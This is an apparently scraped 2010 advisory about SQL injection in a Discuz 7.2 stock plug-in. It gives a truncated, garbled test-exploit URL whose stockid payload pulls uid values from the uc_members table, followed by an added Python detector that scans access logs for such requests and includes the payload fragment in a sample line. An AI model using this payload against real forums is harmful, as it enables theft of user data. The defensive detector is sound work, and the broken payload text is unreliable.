Discuz 7.2 "my vest" plug-in injection vulnerability - vulnerability warning - the black bar safety net

2010-07-29T00:00:00
ID MYHACK58:62201027724
Type myhack58
Reporter Anonymous
Modified 2010-07-29T00:00:00

Description

Discuz! is a general-purpose community forum software system. Without any programming background, a user can, through simple setup and installation, build a fully featured, high-capacity and highly customizable forum service on the Internet.

Vulnerable plug-in: plugin.php

Test exploit (EXP):

http://127.0.0.1/plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=4 9%20and(select%2 0 1%20from(select%20count(*),concat((select%2 0(select%2 0(SELECT%20concat(0x7e,0x27,uc_members. uid,0x27,0x7e)%20FROM%2 0bbs_data. uc_members%2

The database and table names depend on the situation. Garbled output is an encoding problem; the encoding is generally UTF-8.
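
Detection check for the request shape shown above, as an added example that is not part of the original advisory: it scans web access log lines for plugin.php requests to the stock plug-in whose stockid parameter is not a plain integer. The combined log format, the assumption that a legitimate stockid is numeric, the function names and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments of the kind the test URL carries in stockid.
SQL_HINT_RE = re.compile(r"\b(select|union|concat|from|and|or)\b|0x[0-9a-f]+|[()'*]", re.I)

def classify_stockid(log_line):
    """Return 'ok', 'non_numeric' or 'sqli_like' for stock plug-in requests, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/plugin.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if "stock" not in params.get("identifier", []):
        return None
    verdict = "ok"
    for value in params.get("stockid", []):
        if re.fullmatch(r"[0-9]+", value):  # assumption: a valid stockid is an integer
            continue
        if SQL_HINT_RE.search(value):
            return "sqli_like"
        verdict = "non_numeric"
    return verdict

def scan(lines):
    """Classify every log line; None means the line is not a stock plug-in request."""
    return [classify_stockid(line) for line in lines]

SAMPLE_LOG = [  # constructed log lines, not taken from the advisory
    '192.0.2.10 - - [29/Jul/2010:10:00:01 +0800] "GET /plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=49 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [29/Jul/2010:10:00:09 +0800] "GET /plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=49%20and(select%201%20from(select%20count(*) HTTP/1.1" 200 311',
    '192.0.2.10 - - [29/Jul/2010:10:00:12 +0800] "GET /plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=abc HTTP/1.1" 200 100',
    '192.0.2.10 - - [29/Jul/2010:10:00:15 +0800] "GET /forumdisplay.php?fid=2 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(verdict, line.split('"')[1])
```

Lines classified as sqli_like are candidates for incident review; non_numeric hits are weaker signals that still indicate the parameter reached the plug-in without integer validation.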